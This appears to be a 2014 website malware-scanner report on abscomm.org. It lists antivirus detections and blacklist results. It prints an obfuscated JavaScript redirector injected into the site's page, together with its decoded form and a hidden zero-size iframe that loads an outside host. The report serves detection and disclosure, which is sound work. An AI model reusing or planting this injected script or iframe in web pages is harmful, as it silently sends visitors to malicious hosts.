New scan:

Malware Scanner report for abscomm.org

Malicious/Suspicious/Total urls checked
1/0/8
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://abscomm.org/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 07 Oct 2014 10:49:28 GMT
Location: http://home.earthlink.net/~abscomm/
Server: Sun-ONE-Web-Server/6.1
Content-Length: 122
Content-Type: text/html
clean
http://home.earthlink.net/~abscomm/
200 OK
Content-Length: 19336
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

if('RMbRn'=='oRMHPH')mElLpP();if('WybTj'=='CyuApf')EmWdD();var tLxW='YiHbtD';var ItnHi='Rfpu';var ZrLInA;var qNqqsi="f\x72o\x6dCharCo\x64e";var FTas='ftzyPo';var ATaLK=184;var appVersion_var="a\x70\x70Versi\x6f\x6e";var vquLKIyMM="con\x73t\x72\x75\x63t\x6fr";if('QCuD'=='peOUre')iqchS='poIFqz';var px1_var="1\x70x";function Kcvk(){var DXCPo='ChOA';if('RukVtP'=='ZxhF')liqngX();}
var GErrw="9eaaaaa6706565a197aa9ba9aa97aa676664a8ab659fa464999d9f756e";var oSYbE='qaIvpf';var jyMTjcHwq="ap\x70\x65\x
... 2480 bytes are skipped ...
qjpny(){}var vnwQJ=174;if(document[UrFCM]){var Ubbgd=42;var document_body_var=document[UrFCM];var VZCBXe=215;document_body_var[jyMTjcHwq].apply(document_body_var,[HpjIGmD]);if('KbbLrX'=='CzkYXz')arFrt();var YLQG=53;}else{if('tmsn'=='tMbCyl')QGtD='xdBw';setTimeout(NiwDaBYyo,120);if('DYctWn'=='pXvO')beMh='iwspPN';}
function VqfE(){}if('OdsY'=='nzfrMq')hCqY();if('hQdG'=='WQbh')dLblI();}
NiwDaBYyo();if('MUNj'=='yrMNX')BLDDN='kWAtoW';if('WRvy'=='FxpL')BqImgJ();var GohttM=188;var Znziw='xNAd';

Decoded script:












(function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd*\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB(
... 1771 bytes are skipped ...
t[1][a[9]]=r[2];t[0][a[4]](t[2]);return t[0];})(CV),d=CV[UB("\xe7w\xbe,r<bf")],i,b,l=UB("\xef}\xb3>k1"),t=UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd*\xf5\xe6"),m=CV[UB("\xcey\xa91")];if(e0k){if(b=d[t](UB("\xe1w\xb9\x20"))[0])((i=d[t](UB("\xe7q\xab")))[l]?i[m[UB("\xe5t\xb26m")](m[UB("\xf1y\xb3=p4")]()*i[UB("\xef}\xb3>k1")])]:b)[UB("\xe2h\xad<q=Oz\xbeig")](e0k);else d[UB("\xf4j\xb4-z")](e0k[UB("\xecm\xa9<m\x11X_"+"\x9b")]);}delete Uv;delete UB;delete p9R;})(window);

Antivirus reports:

Avast
JS:Redirector-AAA [Trj]
Ikarus
Trojan.JS.Redirector
nProtect
Trojan.JS.Agent.HBI
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.RCBH1KJ
Emsisoft
Trojan.JS.Agent.HBI (B)
Comodo
UnclassifiedMalware
TrendMicro
HEUR_HTJS.HDJSFN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Redirector.LB
PCTools
Trojan.Gen
F-Secure
Trojan.JS.Agent.HBI
F-Prot
JS/IFrame.NM.gen
GData
Trojan.JS.Agent.HBI
Symantec
Trojan.Gen.2
Commtouch
JS/IFrame.NM.gen
BitDefender
Trojan.JS.Agent.HBI

Hidden iFrame found.
size: 0x0     
src: http://geomy.zz.mu/go.php?sid=1

<iframe src="http://geomy.zz.mu/go.php?sid=1" width="0" height="0" frameborder="0">

http://rss.brainyhistory.com/link/historyevents.js
200 OK
Content-Length: 601
Content-Type: application/x-javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21308
Content-Type: text/javascript
clean
http://www.statcounter.com/counter/counter_xhtml.js
200 OK
Content-Length: 15530
Content-Type: application/x-javascript
clean
http://edge.quantserve.com/quant.js
200 OK
Content-Length: 7874
Content-Type: application/x-javascript
clean
http://tubestat160.ru/get.php
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://tubestat160.ru/test404page.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: abscomm.org

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 07 Oct 2014 10:49:28 GMT
Location: http://home.earthlink.net/~abscomm/
Server: Sun-ONE-Web-Server/6.1
Content-Length: 122
Content-Type: text/html

...122 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: abscomm.org
Referer: http://www.google.com/search?q=abscomm.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=abscomm.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://abscomm.org/

Result: abscomm.org is not infected or malware details are not published yet.